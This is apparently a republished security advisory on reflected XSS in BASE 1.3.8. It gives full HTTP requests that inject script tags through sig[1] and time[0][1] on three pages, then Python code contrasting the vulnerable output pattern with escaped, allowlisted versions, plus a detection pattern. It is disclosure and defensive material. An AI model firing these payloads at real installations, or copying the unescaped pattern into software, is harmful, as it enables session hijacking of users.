Basic Analysis and Security Engine (BASE) 1.3.8 XSS

2010-05-06 / 2010-05-07
Credit: none
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

=== XSS Reflective ===

Three pages are affected by reflective XSS:

/base/base_qry_main.php
/base/base_stat_alerts.php
/base/base_stat_uaddr.php

=== Example 1 ===

/base/base_qry_main.php
The value of sig[1] is not being validated.

=== Request ===

GET /base/base_qry_main.php?search=1&sensor=+&ag=+&sig%5B0%5D=+&sig%5B2%5D=%3D&sig%5B1%5D=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sig_class=+&sig_priority%5B0%5D=+&sig_priority%5B1%5D=&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=+&time%5B0%5D%5B2%5D=+&time%5B0%5D%5B3%5D=&time%5B0%5D%5B4%5D=+&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+&submit=ADD+TIME&ip_addr%5B0%5D%5B0%5D=+&ip_addr%5B0%5D%5B1%5D=+&ip_addr%5B0%5D%5B2%5D=%3D&ip_addr%5B0%5D%5B3%5D=&ip_addr%5B0%5D%5B8%5D=+&ip_addr%5B0%5D%5B9%5D=+&ip_field%5B0%5D%5B0%5D=+&ip_field%5B0%5D%5B1%5D=+&ip_field%5B0%5D%5B2%5D=%3D&ip_field%5B0%5D%5B3%5D=&ip_field%5B0%5D%5B4%5D=+&ip_field%5B0%5D%5B5%5D=+&data_encode%5B0%5D=+&data_encode%5B1%5D=+&data%5B0%5D%5B0%5D=+&data%5B0%5D%5B1%5D=+&data%5B0%5D%5B2%5D=&data%5B0%5D%5B3%5D=+&data%5B0%5D%5B4%5D=+&new=1&sort_order=none&caller=&num_result_rows=-1&current_view=-1 HTTP/1.1
Host: 172.16.105.130
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://172.16.105.130/base/base_qry_main.php?new=1
Cookie: PHPSESSID=dad4b449a7b0c4e0b397c29d960ae9c2

=== Response ===

...snip...
<INPUT TYPE="text" NAME="sig[1]" SIZE=40 VALUE=""><script>alert("XSS")</script>"><BR><B>Classification: </B><SELECT NAME="sig_class">
...snip...

====================================================================================================================================================

=== Example 2 ===

/base/base_stat_alerts.php
The value of time[0][1] is not being validated.

=== Request ===

GET /base/base_stat_alerts.php?time_cnt=1&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=%3E%3D5c9f2<script>alert(1)</script>f0d91eba175&time%5B0%5D%5B2%5D=05&time%5B0%5D%5B3%5D=22&time%5B0%5D%5B4%5D=2009&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+ HTTP/1.1
Host: 172.16.105.131
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=06daf1ffd99701a4451d37348ded8347;

=== Response ===

...snip...
<TD><CODE> time >=5c9f2<script>alert(1)</script>f0d91eba175 [ 05 / 22 / 2009 ] [ </CODE>
...snip...

====================================================================================================================================================

=== Example 3 ===

/base/base_stat_uaddr.php
The value of time[0][1] is not being validated.

=== Request ===

GET /base/base_stat_uaddr.php?addr_type=2&sort_order=occur_d&time_cnt=1&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=%3E%3Dd5c9d<script>alert(1)</script>4e48bef68b4&time%5B0%5D%5B2%5D=05&time%5B0%5D%5B3%5D=22&time%5B0%5D%5B4%5D=2009&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+ HTTP/1.1
Host: 172.16.105.131
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=06daf1ffd99701a4451d37348ded8347;

=== Response ===

...snip...
<TD><CODE> time >=d5c9d<script>alert(1)</script>4e48bef68b4 [ 05 / 22 / 2009 ] [ </CODE>
...snip...
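All three findings share one root cause: a query-string value (sig[1], or the comparison operator in time[0][1]) is written back into the page without output encoding, and the operator field is never checked against the small set of values the form can legitimately submit. The following Python is an added illustration of the defect pattern beside its hardened form; it is not BASE's own PHP code, and the function names, the operator allowlist and the sample payloads (copied from the examples above) are constructed for this demonstration.

```python
import html
import re

# Constructed sample values, taken verbatim from the advisory's examples:
# Example 1 injects into the sig[1] INPUT attribute, Examples 2 and 3 into the
# time[0][1] comparison operator echoed inside <CODE>.
SIG1_PAYLOAD = '"><script>alert("XSS")</script>'
TIME_OP_PAYLOAD = '>=5c9f2<script>alert(1)</script>f0d91eba175'

# Assumed allowlist of comparison operators a time-criteria form can submit.
# BASE's real operator set is not given on the page; this is an illustration.
ALLOWED_OPERATORS = frozenset({"=", "!=", "<", "<=", ">", ">="})


def render_sig_field_vulnerable(sig1: str) -> str:
    """The defect pattern: the raw request value lands inside a quoted attribute,
    so a leading '">' closes the attribute and the tag and the rest is markup."""
    return f'<INPUT TYPE="text" NAME="sig[1]" SIZE=40 VALUE="{sig1}">'


def render_sig_field_safe(sig1: str) -> str:
    """Hardened form: entity-encode the value, including quotes, before it is
    placed into an attribute.  The browser then shows the text literally."""
    return (f'<INPUT TYPE="text" NAME="sig[1]" SIZE=40 '
            f'VALUE="{html.escape(sig1, quote=True)}">')


def operator_is_valid(op: str) -> bool:
    """Allowlist check for time[0][1]: anything outside the fixed operator set
    (such as the injected string above) is rejected rather than echoed."""
    return op.strip() in ALLOWED_OPERATORS


def render_time_criteria_safe(op: str, month: str, day: str, year: str) -> str:
    """Validate first, then still encode on output (defence in depth)."""
    if not operator_is_valid(op):
        raise ValueError("invalid comparison operator")
    if not (re.fullmatch(r"\d{1,2}", month) and re.fullmatch(r"\d{1,2}", day)
            and re.fullmatch(r"\d{4}", year)):
        raise ValueError("invalid date component")
    return (f"<TD><CODE> time {html.escape(op.strip())} "
            f"[ {month} / {day} / {year} ] </CODE>")


def attribute_is_intact(rendered: str) -> bool:
    """Constructed check for the test: the rendered fragment must still be a
    single INPUT element with no script element smuggled in."""
    return rendered.count("<") == 1 and "<script" not in rendered.lower()


if __name__ == "__main__":
    print("vulnerable:", render_sig_field_vulnerable(SIG1_PAYLOAD))
    print("hardened:  ", render_sig_field_safe(SIG1_PAYLOAD))
    print("operator accepted:", operator_is_valid(TIME_OP_PAYLOAD))
    print(render_time_criteria_safe(">=", "05", "22", "2009"))
```

The escaping step alone closes the reflected XSS for every context on the page; the operator allowlist is the additional check a reviewer would expect for time[0][1], since that field is only ever one of a handful of fixed tokens and has no reason to carry free text at all. For detection, the request lines above are a useful pattern: `%5B` / `%5D` parameter names with `<script` or `%3Cscript` in their values against the three listed paths.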

References:

http://spl0it.org/files/BASE-XSS/Reflective-notes.txt
http://secureideas.cvs.sourceforge.net/viewvc/secureideas/base-php4/base_ag_common.php?sortby=date&view
http://secunia.com/advisories/35222
http://base.secureideas.net/news.php



Copyright 2024, cxsecurity.com
